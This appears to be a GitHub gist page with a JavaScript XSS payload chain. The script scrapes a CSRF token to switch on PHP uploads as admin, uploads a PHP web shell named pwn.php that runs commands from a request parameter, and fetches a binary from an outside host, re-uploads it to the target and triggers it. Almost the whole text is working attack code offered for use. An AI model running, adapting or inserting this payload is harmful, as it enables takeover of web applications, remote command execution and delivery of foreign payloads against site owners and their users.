Last active
July 14, 2023 09:41
Some XSS payload for File Upload, leaking CSRF tokens, updating data and triggering files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function updateConfig(csrf) { | |
| xhr = new XMLHttpRequest(); | |
| xhr.open('POST', '/application/vulnerable/to/fileUpload/settings', true); | |
| xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); | |
| xhr.withCredentials = true; | |
| configPayload = 'save=1&user=admin&allowFileUpload=php&csrf=' + csrf; | |
| xhr.send(configPayload); | |
| } | |
| function getCSRF() { | |
| xhr = new XMLHttpRequest(); | |
| xhr.open('GET', 'application/vulnerable/to/fileUpload/settings', true); | |
| xhr.responseType = 'document'; | |
| xhr.onload = function () { | |
| if (this.readyState === XMLHttpRequest.DONE && this.status === 200) { | |
| var doc = xhr.responseXML; | |
| csrf = doc.getElementById('csrf_token').innerText; | |
| updateConfig(csrf); | |
| } | |
| }; | |
| xhr.send(); | |
| } | |
| function pwn(link) { | |
| xhr = new XMLHttpRequest(); | |
| xhr.open('GET', link, true); | |
| xhr.withCredentials = true; | |
| xhr.send(); | |
| } | |
| function uploadFile() { | |
| boundary = '---------------------------1466369521412649741807627863'; | |
| payload = "<?php system($_REQUEST['cmd']); ?>"; | |
| body = ""; | |
| body += "--" + boundary + "\r\n"; | |
| body += 'Content-Disposition: form-data; name="newAttachment"; filename="pwn.php"\r\n'; | |
| body += 'Content-Type: application/x-php\r\n\r\n'; | |
| body += payload + "\r\n\r\n"; | |
| body += "--" + boundary + "--"; | |
| xhr = new XMLHttpRequest(); | |
| xhr.open('POST', '/application/vulnerable/to/fileUpload/upload.php', true); | |
| xhr.setRequestHeader('Content-type', 'multipart/form-data; boundary=' + boundary); | |
| xhr.withCredentials = true; | |
| xhr.onreadystatechange = function() { | |
| if (this.readyState === XMLHttpRequest.DONE && this.status === 200) { | |
| pwn(); | |
| } | |
| } | |
| xhr.send(body); | |
| } | |
| function uploadBinary(fileBlob, type) { | |
| var file = new File([fileBlob], "DownloadedFile.tgz", { | |
| type: type | |
| }); | |
| var formData = new FormData(); | |
| formData.append('fileFormName', file); | |
| xhr = new XMLHttpRequest(); | |
| xhr.open('POST', '/application/vulnerable/to/fileUpload/upload.php', true); | |
| xhr.withCredentials = true; | |
| xhr.responseType = 'document'; | |
| xhr.onreadystatechange = function() { | |
| if (this.readyState === XMLHttpRequest.DONE && this.status === 200) { | |
| var doc = xhr.responseXML; | |
| triggerLink = doc.getElementsByTagName('SCRIPT')[0].innerText.split('\"')[7]; | |
| pwn(triggerLink); | |
| } | |
| } | |
| xhr.send(formData); | |
| } | |
| function downloadBinary(link) { | |
| xhr = new XMLHttpRequest(); | |
| xhr.open('GET', link, true); | |
| xhr.responseType = 'blob'; | |
| xhr.onreadystatechange = function() { | |
| if (this.readyState === XMLHttpRequest.DONE && this.status === 200) { | |
| var type = xhr.getResponseHeader('Content-Type'); | |
| var fileBlob = new Blob([this.response], { type: type }); | |
| uploadBinary(fileBlob, type); | |
| } | |
| } | |
| xhr.send(); | |
| } | |
| downloadBinary('http://domain.com/file/to/download'); | |
| getCSRF(); | |
| setTimeout(uploadFile, 3000); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment